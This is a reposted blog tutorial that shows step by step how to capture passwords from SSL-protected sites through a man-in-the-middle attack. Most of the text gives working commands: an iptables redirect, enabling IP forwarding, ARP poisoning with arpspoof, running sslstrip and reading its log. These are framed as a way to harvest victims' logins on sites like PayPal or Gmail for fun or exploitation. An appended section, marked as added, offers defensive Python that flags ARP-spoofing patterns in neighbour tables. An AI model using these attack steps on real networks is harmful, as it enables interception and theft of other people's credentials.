Well, if you are looking to capture some passwords from sites that use SSL to encrypt their traffic, here is a small tutorial to help you with that. It uses a tool (a script) called sslstrip. What this tool does is strip the SSL encryption from the traffic, leaving you with a plain flow of text-based network traffic. Then we take it to the next level with a hacker's best friend, a very old method of hacking: the MITM (man-in-the-middle) attack. This way we tunnel the traffic between the victim and the web server. Now that we have both combined to help us gain passwords and logins to SSL-based sites, we can do most anything with the data we collect from it, whether it be just having fun or exploiting the information. So let's get hopping on how to do this.
(1) Set up iptables with the command below (the table is nat, and the protocol and port options are lowercase -p and double-dash --destination-port / --to-port):
>> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
(2) Set up forwarding of the traffic
>> cat /proc/sys/net/ipv4/ip_forward
** After running this command you will get either a 0 or a 1. If you have a 1 then you don't have to worry about the next command, but if you have a 0 then you need to change the value to 1; the next command will do that (note the > redirect, which writes the value into the file):
>> echo "1" > /proc/sys/net/ipv4/ip_forward
This command will change the value to 1.
OK, once you have these ready you need to set up the ARP poisoning. For this we will use arpspoof, a command-line tool.
cmdline>> arpspoof -i eth0 -t [target_IP] [Attacker_IP]
** target_IP : the IP address of the target computer you would like to attack.
Attacker_IP : the IP address of your computer, or of the computer you are going to use for the attack.
** IP example:
------------------------------------
000.000.000.000
192.168.1.1
202.205.170.36
------------------------------------
(3) Set up the strip for the MITM
Now, because we have arpspoof running, and also because we forward all incoming traffic to wherever it was meant to go, we are now in the middle of all the traffic, which also means we can see everything that passes between both computers. So let's look at a traffic chart of what is happening.
                         normal route
   +--------------+ >>>>>>>>>>>>>>>>>>>>>> +----------------+
   |   VICTIM     |                        |  WEB-SERVER    |
   |  192.1.1.10  |                        |  (SSL-en       |
   +--------------+                        |  200.1.1.12    |
          #                                +----------------+
          #                                         #
          #  MITM route  +--------------+  MITM route
          ###########>>  |   ATTACKER   |  <<###########
                         |  192.1.1.20  |
                         +--------------+
                         //-> arpspoof
                         //-> ip_forwarding
                         //-> sslstrip
As seen in the diagram, since the attacker can see what is going through the line between the "VICTIM" and the "WEB-SERVER", he can do anything to the victim's traffic, even inject something into the traffic to the web server. But here we are using sslstrip to strip the SSL encryption so that we can see the raw text password and username.
So what does sslstrip do for you? Well, it actually pre-authenticates you to the SSL server, which means that the attacker authenticates for you, meaning that the traffic from your computer (if you are the victim) is in clear text to the attacker. Meaning he can see everything you are writing to the SSL server in clear, readable text.
So now the command to make this happen is below:
>> ./sslstrip.py -L 8080
Once that is running, the only thing the attacker needs to do is wait for you to go to an SSL site, say PayPal or Hotmail or Gmail, or any service that hosts SSL-supported authentication.
Once he thinks he has waited long enough for data, or some kind of log data, to generate, he will want to view the results. By default sslstrip generates a log file called sslstrip.log; to view this file you can run the following command.
>> more sslstrip.log
Now, if it went well and your victim logged in while your attack was running, you should see some great stuff in your log file.
**********{summary commands}********************
-----------------------------------------------
1] >> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
2] >> cat /proc/sys/net/ipv4/ip_forward
3] >> echo "1" > /proc/sys/net/ipv4/ip_forward
4] >> arpspoof -i eth0 -t [target_IP] [Attacker_IP]
5] >> ./sslstrip.py -L 8080
6] >> more sslstrip.log
-----------------------------------------------
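Added example from the defender's side, not part of the original tutorial: the ARP poisoning step above leaves a footprint in every host's ARP cache, a known IP (the gateway above all) suddenly answering from a different MAC, and one MAC answering for several IPs. The Python below parses constructed `ip neigh` snapshots (addresses match the diagram, with 192.1.1.1 assumed as the gateway) and flags exactly that; the TRUSTED static binding and the snapshot contents are assumptions.

```python
import re
from collections import defaultdict

# Constructed `ip neigh` snapshots: the first taken while the LAN is healthy,
# the second after an ARP poisoner has started answering for the gateway
# (192.1.1.1) and the victim (192.1.1.10) from its own MAC (the 192.1.1.20 host).
SNAPSHOT_BEFORE = [
    "192.1.1.1 dev eth0 lladdr 00:11:22:33:44:01 REACHABLE",
    "192.1.1.10 dev eth0 lladdr 00:11:22:33:44:10 STALE",
    "192.1.1.20 dev eth0 lladdr 00:11:22:33:44:20 REACHABLE",
]
SNAPSHOT_AFTER = [
    "192.1.1.1 dev eth0 lladdr 00:11:22:33:44:20 REACHABLE",
    "192.1.1.10 dev eth0 lladdr 00:11:22:33:44:20 STALE",
    "192.1.1.99 dev eth0  FAILED",          # no lladdr: skipped by the parser
]
# Assumed static binding for the gateway, the host a poisoner most wants to impersonate.
TRUSTED = {"192.1.1.1": "00:11:22:33:44:01"}

NEIGH_RE = re.compile(r"^(\S+) dev \S+ lladdr ([0-9a-fA-F:]{17})")

def parse_neigh(lines):
    """Turn `ip neigh` rows into (ip, mac) pairs; rows without lladdr are dropped."""
    pairs = []
    for line in lines:
        m = NEIGH_RE.match(line.strip())
        if m:
            pairs.append((m.group(1), m.group(2).lower()))
    return pairs

def detect_arp_spoof(bindings, trusted=None):
    """Return (kind, ip, mac) alerts: trusted-mismatch (contradicts a static entry),
    mac-changed (an IP we already learned now answers from another MAC) or
    multi-ip (one MAC claims more than one IP, the classic arpspoof footprint)."""
    trusted = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    learned = dict(trusted)            # ip -> mac first seen for it
    claims = defaultdict(set)          # mac -> ips it has answered for
    alerts = []
    for ip, mac in bindings:
        mac = mac.lower()
        if ip in trusted and trusted[ip] != mac:
            alerts.append(("trusted-mismatch", ip, mac))
        elif learned.setdefault(ip, mac) != mac:
            alerts.append(("mac-changed", ip, mac))
        if ip not in claims[mac]:
            claims[mac].add(ip)
            if len(claims[mac]) > 1:
                alerts.append(("multi-ip", ip, mac))
    return alerts
```

Run detect_arp_spoof(parse_neigh(SNAPSHOT_BEFORE + SNAPSHOT_AFTER), TRUSTED) to see the four alerts the poisoned snapshot produces; the healthy snapshot alone produces none.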
OK, hope you have learned something. Happy hacking.
This article is reposted from hackfreer's 51CTO blog, original link: http://blog.51cto.com/pnig0s1992/565116; to reprint it, please contact the original author.